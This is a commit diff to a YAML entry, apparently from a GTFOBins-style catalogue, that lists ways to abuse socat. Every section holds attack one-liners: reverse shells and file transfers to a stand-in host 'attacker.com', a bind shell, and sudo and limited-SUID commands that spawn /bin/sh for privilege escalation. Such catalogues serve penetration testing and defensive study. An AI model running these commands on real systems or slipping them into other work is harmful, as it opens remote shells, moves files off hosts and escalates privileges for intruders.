Improve socat

This commit is contained in:
Andrea Cardaci 2020-05-13 19:36:45 +02:00
parent 0d98790312
commit 3d9370b1e4

View File

@ -2,30 +2,18 @@
functions: functions:
shell: shell:
- code: | - code: |
socat STDIN EXEC:/bin/bash socat stdin exec:/bin/sh
reverse-shell: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
bind-shell: bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
file-upload: file-upload:
- description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file. - description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file.
code: | code: |
@ -40,4 +28,13 @@ functions:
RPORT=12345 RPORT=12345
LFILE=file_to_save LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
sudo:
- code: |
sudo socat stdin exec:/bin/sh
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
--- ---